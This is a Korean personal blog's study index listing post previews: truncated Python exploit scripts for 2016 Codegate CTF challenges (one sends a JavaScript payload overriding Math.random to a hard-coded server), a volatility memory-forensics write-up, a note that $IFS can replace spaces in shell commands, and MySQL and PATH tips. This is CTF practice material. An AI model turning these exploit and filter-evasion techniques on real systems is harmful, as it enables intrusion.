본문 바로가기

Study

4월 7일 세미나 보호되어 있는 글입니다. 더보기
3월 24일 세미나 보호되어 있는 글입니다. 더보기
2016 codegate watermellon exploit only from socket import *from struct import *import sysimport time ################################def until(s, string): data = '' while string not in data: data += s.recv(1) return data def recvAll(s): while(True): data = s.recv(1024) if not data: break print(data)################################ p = lambda x:pack(' 더보기
2016 codegate JS_IS_NOT_A_JAIL exploit only from socket import *from struct import *import re host = '175.119.158.131'port = 1129 sock = socket(AF_INET, SOCK_STREAM)sock.connect((host, port))i=1 #20150303 a= "tmp =0; Math.random = function(){"a += "if(tmp==0){ var c = 0.23; }"a += "else if(tmp==1){ var c = 0.22; }"a += "else if(tmp==2){ var c = 0.24; }"a += "else if(tmp==3){ var c = 0.32; }"a += "else if(tmp==4){ var c = 0.22; }"a += "els.. 더보기
pwnable.kr ascii exploit only 보호되어 있는 글입니다. 더보기
2015 Christmas CTF [FORENSIC] 100 do you want to~ 포렌식에 대한 기본지식이 없어 나온 Write up을 참조하여 풀이 하였다. 운영자가 준 압축 파일을 열면 for.mp4, mem.raw 파일이 있다. for.mp4 파일 안에는 .7z 파일이 숨겨 져 있고 .7z 파일을 추출하고 압축을 풀려고 하면 암호가 걸려 있는 것을 확인 할 수 있다. 암호를 알아내기 위해서 mem.raw를 volatility로 분석.( volatility는 칼리 리눅스에 깔려 있는 것을 사용했다. ) 1. python vol.py -f ./../../volatility/mem.raw imageinfo- 운영체제 정보를 확인 : WinXPSP2x86 2. python vol.py -f ./../../volatility/mem.raw pstree- 실행 중인 프로세스 확인 : Hwp.. 더보기
$IFS $IFS가 shell script에서 로 이용될 수 있다는 사실!처음 알았다... 더보기
pwnable.kr rsa calculator exploit only 보호되어 있는 글입니다. 더보기
mysql 계정 만들고 권한 주기 http://link2me.tistory.com/431 더보기
환경 변수 등록 방법 export PATH=$PATH:/tmp/arch 더보기